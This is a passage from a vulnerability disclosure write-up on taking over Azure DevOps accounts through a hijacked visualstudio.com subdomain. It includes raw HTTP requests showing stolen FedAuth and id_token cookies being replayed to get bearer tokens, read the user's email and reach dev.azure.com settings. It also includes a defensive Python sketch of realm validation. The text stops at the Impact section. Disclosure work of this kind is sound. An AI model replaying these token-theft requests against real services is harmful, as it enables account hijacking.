
Azure DevOps Account Takeover via Domain Hijacking (Part 2)

Then, on the server side of the domain under our control, arec.project-cascade.visualstudio.com, a POST request tied to app.vsaex.visualstudio.com is automatically triggered, and we also receive another authentication token for the victim's access to app.vsaex.visualstudio.com, as follows:

POST /_signedin?realm=arec.project-cascade.visualstudio.com&protocol=&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F HTTP/1.1
Host: arec.project-cascade.visualstudio.com
Content-Length: 4634
Referer: https://arec.vssps.visualstudio.com/_signedin?realm=arec.project-cascade.visualstudio.com&protocol=&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F
Cookie: ...omitted for brevity...

id_token=<snip>&FedAuth=<snip>&FedAuth1=<snip>
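As an added illustration (not code from the original write-up or from Microsoft), the following Python contrasts a suffix-only trust policy for the realm parameter, which any subdomain under the parent domain satisfies, with a policy that checks an explicit registry of provisioned hostnames and requires reply_to to point back to that same host over HTTPS. The registry contents and the function names are assumptions; the sample request line is taken from the request above.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed sample: the request line of the _signedin POST quoted above.
SAMPLE_REQUEST_LINE = (
    "POST /_signedin?realm=arec.project-cascade.visualstudio.com&protocol="
    "&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F HTTP/1.1"
)

# Hypothetical registry of hostnames the identity provider has actively
# provisioned for tenants (an assumption; the real service's registry is not
# shown on the page). Only hosts listed here may receive tokens.
REGISTERED_REALMS = {"app.vsaex.visualstudio.com", "dev.azure.com"}


def parse_signedin(request_line: str) -> dict:
    """Extract method, path, realm and reply_to from a _signedin request line."""
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    return {
        "method": method,
        "path": parts.path,
        "realm": query.get("realm", [""])[0].lower(),
        "reply_to": query.get("reply_to", [""])[0],
    }


def suffix_only_check(realm: str) -> bool:
    """Weak policy: trust any hostname under the product's parent domain.
    A dangling or re-registrable subdomain passes this check."""
    return realm.endswith(".visualstudio.com")


def strict_realm_check(realm: str, reply_to: str, registry=REGISTERED_REALMS) -> bool:
    """Hardened policy: the realm must be an explicitly registered host and
    reply_to must point back to that same host over HTTPS."""
    if realm not in registry:
        return False
    reply = urlsplit(reply_to)
    return reply.scheme == "https" and (reply.hostname or "").lower() == realm


def evaluate(request_line: str) -> dict:
    """Run both policies against one request line and report the outcome."""
    req = parse_signedin(request_line)
    return {
        "realm": req["realm"],
        "suffix_only_accepts": suffix_only_check(req["realm"]),
        "strict_accepts": strict_realm_check(req["realm"], req["reply_to"]),
    }


if __name__ == "__main__":
    print(evaluate(SAMPLE_REQUEST_LINE))
```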


Exploitation

Using the authentication tokens obtained above, we can authenticate to legitimate domains such as vsaex.visualstudio.com, dev.azure.com and vssps.dev.azure.com, establish a valid login, and take over the identity behind these accounts. Taking the takeover of an app.vsaex.visualstudio.com account as an example, we send an authentication request carrying the stolen tokens:

POST /_apis/WebPlatformAuth/SessionToken HTTP/1.1
Host: app.vsaex.visualstudio.com
Connection: close
Content-Length: 105
Origin: https://app.vsaex.visualstudio.com
X-VSS-ReauthenticationAction: Suppress
Content-Type: application/json
Accept: application/json;api-version=6.0-preview.1;excludeUrls=true
X-Requested-With: XMLHttpRequest
...omitted for brevity...
Cookie: UserAuthentication=<snipped id_token>; FedAuth=<snipped FedAuth>; FedAuth1=<snipped>

{"appId":"00000000-0000-0000-0000-000000000000","force":false,"tokenType":0,"namedTokenId":"Aex.Profile"}

The server then responds with another valid user token issued by app.vsaex.visualstudio.com:

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Length: 933
Content-Type: application/json; charset=utf-8; api-version=6.0-preview.1
...omitted for brevity...

{"appId":"00000000-0000-0000-0000-000000000000","token":"<snip>","tokenType":"session","validTo":"2020-05-12T06:45:47.2007474Z","namedTokenId":"Aex.Profile"}

With this token, the user's email address can be retrieved from app.vsaex.visualstudio.com. Request:

GET /_apis/User/User HTTP/1.1
Host: app.vsaex.visualstudio.com
Connection: close
X-TFS-FedAuthRedirect: Suppress
X-VSS-ReauthenticationAction: Suppress
X-Requested-With: XMLHttpRequest
Accept-Language: en-US
Authorization: Bearer <snip just received bearer token>
Accept: application/json;api-version=6.0-preview.1;excludeUrls=true
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
X-TFS-Session: ab1e4b56-599c-4ab6-9f5e-756c486a0f2b
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: https://app.vsaex.visualstudio.com/me?mkt=en-US
Accept-Encoding: gzip, deflate

Response:

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 258
...omitted for brevity...

{"descriptor":"msa.NTg0Zjc4NDAtYzc5ZC03MWU0LWJkN2ItMDZhY2Y1N2Q2OTA1","displayName":"s","mail":"<account_email>","unconfirmedMail":null,"country":"AU","dateCreated":"2018-05-25T23:19:53.6843383+00:00","lastModified":"2019-01-06T15:43:50.2963651+00:00","revision":0}

At the same time, with this stolen token the development projects the user has associated with dev.azure.com can also be viewed via https://app.vsaex.visualstudio.com/me?mkt=en-US.


Ultimately, the project resources the user hosts on dev.azure.com can be accessed as well. Request:

GET /seanyeoh/_usersSettings/keys?__rt=fps&__ver=2 HTTP/1.1
Host: dev.azure.com
Connection: close
x-tfs-fedauthredirect: Suppress
Origin: https://dev.azure.com
x-vss-reauthenticationaction: Suppress
authorization: Bearer <snip>
accept: application/json;api-version=5.0-preview.1;excludeUrls=true;enumsAsNumbers=true;msDateFormat=true;noArrayWrap=true
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9


Impact

A malicious attacker can craft the following link and send it to an unsuspecting victim, achieving a one-click takeover of the victim's account:
